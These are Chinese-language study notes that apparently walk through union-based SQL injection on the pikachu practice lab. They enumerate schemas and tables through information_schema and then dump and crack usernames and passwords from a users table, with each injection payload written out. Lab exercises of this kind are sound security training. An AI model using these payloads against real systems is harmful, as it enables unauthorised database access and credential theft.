通过通过information——拿下
打开mysql
选择information_schema
show tables
desc tables
查看tables字段
查看columns列字段
切换到pikachu表
select id,email from member where username =‘kobe’ union select table_schema ,table_name from information_schema.tables where table_schema=‘pikachu’;
‘
报错
获得基础信息
orderby查询字段数
联合查询数据库名称
查询到名称后
输入
kobe’ union select table_schema ,table_name from information_schema.tables where table_schema=‘pikachu’#
加粗部分是用联合查询得出数据库名称
kobe’ union select table_schema ,table_name from information_schema.tables where table_schema=‘pikachu’#
得到结果
着重关注users
账号密码
用户的
select id ,email from member where username =‘kobe’ union select table _name ,column_name from information_schema.columns where table_name =‘users’;
输入
kobe’union select table_name,column_name from information_schema.columns where table_name=‘users’#
找到两个存用户名和pw的地方
继续往下查询
kobe’union select username ,password from users#
翻译密码
破译完成